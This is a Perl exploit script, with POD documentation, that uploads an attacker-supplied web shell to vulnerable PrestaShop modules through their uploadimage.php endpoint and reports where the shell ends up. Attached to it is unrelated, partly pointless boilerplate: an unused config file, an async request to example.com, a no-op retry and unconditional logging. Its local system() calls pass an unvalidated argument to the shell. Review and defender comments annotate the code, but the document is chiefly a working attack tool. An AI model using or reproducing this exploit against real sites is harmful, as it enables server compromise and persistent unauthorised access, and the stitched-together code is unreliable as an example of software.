#!/usr/bin/perl
use strict;
use warnings;
use FindBin '$Bin';
use Term::ANSIColor;
use URI::Escape;
use HTML::Entities;
use LWP::UserAgent;
use Config;
use JSON;
use IO::Async::Loop;
use Net::Async::HTTP;
# Start from a clean terminal state before any coloured output is printed.
print color('reset');

# Detect OS: %Config reports the platform this perl was built for; the
# OS-specific branch further down compares against this value.
my $os = $Config{osname};
print "Detected OS: $os\n";

# Load configuration: config.json is resolved relative to the current working
# directory and parsed as JSON. A missing file stops the script here, before
# the command-line arguments are examined.
# NOTE(review): $config is not read anywhere else in the visible script.
my $config_file = 'config.json';
open(my $fh, '<', $config_file)
    or die "Could not open '$config_file' $!\n";
my $config_text = do { local $/ = undef; <$fh> };
my $config = decode_json($config_text);
close($fh);

# Define user agent: HTTP client limited to a 10-second timeout.
my $ua = LWP::UserAgent->new(timeout => 10);
# Check arguments: two positional arguments are required (target URL, local
# file path). With fewer, a usage line is printed and the script exits.
if (@ARGV < 2) {
print "Usage: perl $0 Target Shell\n";
exit;
}
# $URL is the target address and $FILE the local file, both taken verbatim
# from the command line with no validation.
my $URL = $ARGV[0];
my $FILE = $ARGV[1];
# Status strings: index 0 is printed on reported success, index 1 otherwise.
my @error = ("Shell uploaded successfully", "Target Not vulnerable");
# Module path fragments the script looks for in the target URL.
# Defender note: requests to "<fragment>uploadimage.php" for any of these
# fragments are the trace this script leaves in web-server access logs.
my @PARAMETER = ("/simpleslideshow/", "/productpageadverts/", "/homepageadvertise/", "/columnadverts/", "/vtemslideshow/");
for my $PARAMETER (@PARAMETER) {
# The fragment is interpolated into the pattern as a regex, not a literal.
if ($URL =~ /$PARAMETER/) {
# Cut the URL at the fragment (the /s flag lets '.' span newlines), then
# append the fragment plus "uploadimage.php" to form the request URL.
# $URL is modified in place, so later loop iterations see the rewritten value.
$URL =~ s/$PARAMETER(.*)//s;
my $add = $PARAMETER . "uploadimage.php";
$URL = $URL . $add;
print "SCAN: $URL\n";
# `use` is processed at compile time, so this import applies to the whole
# file regardless of its position inside the loop; it supplies POST.
use HTTP::Request::Common;
# A fresh user agent replaces the one configured earlier, so the 10-second
# timeout set on that earlier object does not apply to this request.
$ua = LWP::UserAgent->new;
# Sends a POST to the constructed URL, built with the POST helper from the
# 'userfile' entry that references $FILE.
my $response = $ua->request(POST $URL, ['Content_Type' => 'form-data', 'userfile' => [$FILE]]);
my $shellFILE = $FILE;
# Success is decided only by the substring "success" appearing anywhere in
# the response body; the HTTP status code is not checked.
if ($response->content =~ /success/) {
print color 'green';
print "$error[0] ";
# Strip the script's own directory ($Bin, from FindBin) out of the local
# path. $Bin is interpolated as a regex, so metacharacters in the directory
# name are not treated literally.
$shellFILE =~ s/$Bin//g;
# The reported location is the request URL with "uploadimage.php" replaced by
# "slides" followed by the stripped path (the '.' in the pattern is unescaped).
# Defender note: unexpected files under a module's "slides" path are the
# corresponding filesystem trace.
my $shell = "slides" . $shellFILE;
$URL =~ s/uploadimage.php/$shell/g;
print "$URL\n";
print color 'reset';
# Additional OS-specific commands
# NOTE(review): every system() call below is the single-string form with
# $shellFILE interpolated, so shell metacharacters in the second command-line
# argument are interpreted by the local shell. The commands act on the machine
# running the script (the path left after stripping $Bin), not on the target.
if ($os eq 'linux') {
# Linux-specific commands
print "Executing Linux-specific commands...\n";
system("chmod +x $shellFILE");
} elsif ($os eq 'MSWin32') {
# Windows-specific commands
# NOTE(review): this grants the Everyone group full control of the local file.
print "Executing Windows-specific commands...\n";
system("icacls $shellFILE /grant Everyone:F");
} elsif ($os eq 'darwin') {
# macOS-specific commands
print "Executing macOS-specific commands...\n";
system("chmod +x $shellFILE");
} else {
print "OS-specific commands not defined for $os\n";
}
} else {
# No "success" marker in the response body: report the target as not vulnerable.
print color 'red';
print "$error[1]\n";
print color 'reset';
}
}
}
# Asynchronous I/O operations
# An event loop with one HTTP client attached. This section runs on every
# invocation that gets past the module loop and does not use the command-line
# arguments.
my $loop = IO::Async::Loop->new;
my $http = Net::Async::HTTP->new;
$loop->add($http);

# Example asynchronous request: fetch a fixed URL and print the response body.
# NOTE(review): the callback's last statement is print, so it returns print's
# result rather than a Future; confirm the installed Future version accepts that.
my $on_response = sub {
    my ($response) = @_;
    print "Received response: " . $response->content . "\n";
};
# ->get waits for the chained future to complete before continuing.
$http->GET('http://example.com')->then($on_response)->get;
# Logging and monitoring
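# Append one line to script.log in the current working directory.
#
# Parameters:
#   $message - text to record; a newline is appended.
# Returns 1 on success.
# Dies if the log file cannot be opened, written or closed.
sub log_message {
    my ($message) = @_;
    open my $log_fh, '>>', 'script.log' or die "Could not open log file $!\n";
    # Buffered write errors may only surface at close, so check both calls
    # instead of dropping a log line silently.
    print {$log_fh} "$message\n" or die "Could not write to log file $!\n";
    close $log_fh or die "Could not close log file $!\n";
    return 1;
}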
# Appends a fixed line to script.log. The call is unconditional, so the line
# is written on every run that reaches this point, whatever was reported above.
log_message('Script executed successfully');
# Retry mechanism
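# Call $code until it completes without dying, at most $retries times.
#
# Parameters:
#   $code    - code reference to invoke with no arguments.
#   $retries - maximum number of attempts; 0 means $code is never called.
# Returns 1 as soon as an attempt completes without an exception, and an
# empty list / undef when every attempt died, so callers can tell the two
# outcomes apart. Exceptions raised by $code are caught, never rethrown.
sub retry {
    my ($code, $retries) = @_;
    my $attempt = 0;
    while ($attempt < $retries) {
        # The trailing 1 makes eval return true even when $code returns a false value.
        return 1 if eval { $code->(); 1 };
        $attempt++;
        # Pause between attempts only; there is nothing to wait for after the last one.
        sleep 1 if $attempt < $retries;
    }
    return;
}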
# Placeholder invocation: the callback has an empty body, so this performs no work.
my $noop = sub { };
retry($noop, 3);
# Documentation and usage instructions
__END__
=head1 NAME
prestashop_shell_exploit.pl - Prestashop Modules Shell Upload Exploit
=head1 SYNOPSIS
perl prestashop_shell_exploit.pl TARGET SHELL
=head1 DESCRIPTION
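This script exploits vulnerable Prestashop modules to upload a shell. It looks for the simpleslideshow, productpageadverts, homepageadvertise, columnadverts and vtemslideshow module paths in the target URL and sends its request to that module's uploadimage.php.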
=head1 CONFIGURATION
The script uses a configuration file (config.json) for settings.
=head1 AUTHOR
Alisam Technology Team
=head1 LICENSE
This script is licensed under the GPL.
=cut